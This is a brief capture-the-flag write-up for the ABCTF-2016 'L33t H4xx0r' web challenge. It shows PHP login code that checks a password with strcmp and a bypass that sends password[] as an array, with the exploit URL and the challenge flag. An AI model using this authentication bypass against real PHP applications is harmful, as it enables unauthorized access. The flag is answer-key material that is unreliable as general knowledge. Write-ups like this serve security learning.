Home ABCTF-2016 L33t H4xx0r
Writeup
Cancel

L33t H4xx0r

Challenge

If you could bypass the login you could get the flag. Link

Solution

We get to a webpage with a password field and the message Seems like your not a haxxor. We are also given the source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
    $FLAGWEB6 = (file_get_contents("flag.txt"));
    $PASSWORD =  (file_get_contents("flag.txt")); //haha

    if(isset($_GET['password'])){

    if(strcmp($PASSWORD, $_GET['password']) == 0){
            $success = true;
        }
        else{
            $success = false;
        }
    }
    else {
        $success = false;
    }
?>

we see that they use the strcmp function to check the password. We can bypass this by supplying an array named password, instead of a variable, which will always return 0 in the strcmp function.

1
http://yrmyzscnvh.abctf.xyz/web6/?password[]=bla

Flag

abctf{always_know_whats_going_on}